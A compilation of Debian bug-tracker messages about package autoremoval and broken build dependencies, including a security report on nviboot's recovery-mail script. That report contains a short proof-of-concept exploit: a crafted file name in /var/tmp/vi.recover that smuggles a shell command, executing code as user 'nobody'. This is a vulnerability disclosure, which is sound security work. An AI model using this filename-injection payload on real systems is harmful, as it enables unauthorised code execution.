awffull is marked for autoremoval from testing
awffull 3.10.2-4 is marked for autoremoval from testing on 2017-11-20 It is affected by these RC bugs: 728362: awffull: /etc/cron.daily/awffull needs update 833915: awffull: awffull cron script broken
Bug#769719: nviboot fails to send recovery mail
Control: tags -1 + security
* Adam M. Costello , 2014-11-15, 20:47:
(su - nobody -s /bin/sh -c "$SENDMAIL $owner < $i" &) /dev/null 2>&0
Note that "$i" is a name of a file any user can create. This allows
executing arbitrary code as user "nobody".
PoC exploit:
$ echo 'X-vi-recover-path: /etc/fstab' >
'/var/tmp/vi.recover/recover.moo;z=$(pwd|head${IFS}-c1);apt-get${IFS}moo>${z}tmp${z}pwned'
--
Jakub Wilk
Processed: Re: Bug#769719: nviboot fails to send recovery mail
Processing control commands: > tags -1 + security Bug #769719 [nvi] nviboot fails to send recovery mail Added tag(s) security. -- 769719: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=769719 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Processed: Merge duplicates, seems RC
Processing commands for cont...@bugs.debian.org: > forcemerge 728362 833915 Bug #728362 [awffull] awffull: /etc/cron.daily/awffull needs update Bug #833915 [awffull] awffull cron script broken Severity set to 'important' from 'normal' Marked as found in versions awffull/3.10.2-4. Added tag(s) patch. Merged 728362 833915 > severity 728362 serious Bug #728362 [awffull] awffull: /etc/cron.daily/awffull needs update Bug #833915 [awffull] awffull cron script broken Severity set to 'serious' from 'important' Severity set to 'serious' from 'important' > thanks Stopping processing here. Please contact me if you need assistance. -- 728362: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=728362 833915: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=833915 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#880788: w3c-markup-validator build depends on removed transitional package lynx-cur
Source: w3c-markup-validator Version: 1.3+dfsg-3 Severity: serious Tags: buster sid The following packages have unmet dependencies: builddeps:w3c-markup-validator : Depends: lynx-cur but it is not installable Please update the build dependency to lynx.
Bug#880784: webdruid build depends on removed libgd2*-dev provides
Source: webdruid Version: 0.5.4-14 Severity: serious Tags: buster sid The following packages have unmet dependencies: builddeps:webdruid : Depends: libgd2-noxpm-dev but it is not installable Please update the build dependency to libgd-dev.
Bug#880779: png2html build depends on removed libgd2*-dev provides
Source: png2html Version: 1.1-6 Severity: serious Tags: buster sid The following packages have unmet dependencies: builddeps:png2html : Depends: libgd2-noxpm-dev but it is not installable Please change the build dependency to libgd-dev.
Bug#880764: awffull build depends on removed libgd2*-dev provides
Source: awffull Version: 3.10.2-4 Severity: serious Tags: buster sid The following packages have unmet dependencies: builddeps:awffull : Depends: libgd2-xpm-dev but it is not installable or libgd2-noxpm-dev but it is not installable Please change the build dependency to libgd-dev.
